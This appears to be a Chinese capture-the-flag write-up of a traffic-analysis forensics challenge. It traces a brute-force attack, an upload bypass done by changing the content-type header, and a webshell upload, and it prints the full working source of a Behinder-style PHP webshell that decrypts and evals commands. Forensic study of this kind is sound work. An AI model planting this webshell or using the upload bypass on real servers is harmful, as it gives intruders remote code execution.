龙信杯流量分析

分析流量包检材，给出管理员对web环境进行管理的工具名。（标准格式：小皮）

使用流量分析工具CTF-NetA，查找到宝塔流量的域名

筛选DNS，wireshark也有相关记录

bt

分析流量包检材，给出攻击者的ip地址是多少。（标准格式：127.0.0.1）

使用CTF-NetA，筛选出交流最多的IP

wireshark对于连接有记录，打开统计下的Endpoints

因为爆破的原理就是发送大量的爆破报文去尝试破解密码，所以在端点界面中点击packets，使得排序方式为从大到小排序。就可以在该图中得知192.168.209.135为发起爆破的主机，192.168.209.147为被爆破的主机

192.168.209.135

分析流量包检材，给出攻击者爆破出的网站非管理员用户名是。（标准格式：admin）

在返回包中找信息（192.168.209.147——>192.168.209.135）

定位16502数据包，在返回内容中找到saber和luna用户

也可以用tcp追踪流看

后面发现saber用户登录过管理员后台，属于管理员权限，所以答案为luna

luna

分析流量包检材，攻击者进行目录扫描得到的具有后门的页面url路径为。（标准格式：/abc.html）

一般利用点都在流量包的最后面，排序一下找到上传点

/up_load.php

分析流量包检材，攻击者通过修改请求包中的哪个字段导致恶意文件成功上传。（标准格式：test-type）

后面一连串的都是连接cont.php，怀疑是连接的webshell，这个问题应该是在问上传这个木马文件时修改了什么参数。常见的有上传图片木马，将图片上传后，bp抓包改content-type，而这题答案就是这个

找到修改点

content-type

分析流量包检材，攻击者上传成功的恶意文件, 该文件的临时存放路径是。（标准格式：/abc/edf）

就在上面一题的界面最底下

/tmp/php38mbeJ

分析流量包检材，服务器php配置文件的存放位置（标准格式：/www/sev/php.ini）

由上一题的数据包可知cont.php的代码内容——AES加密

<?php
@error_reporting(0);
session_start();
	$key="e45e329feb5d925b";
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

找到流量包，可以看出符合冰蝎的流量特征（Content-type: Application/x-www-form-urlencoded），所以后面进行aes+base64的解密

原理可以参考：

1.冰蝎4.0特征分析及流量检测思路 - FreeBuf网络安全行业门户

2.冰蝎-特征检测及报文解密-腾讯云开发者社区-腾讯云 (tencent.com)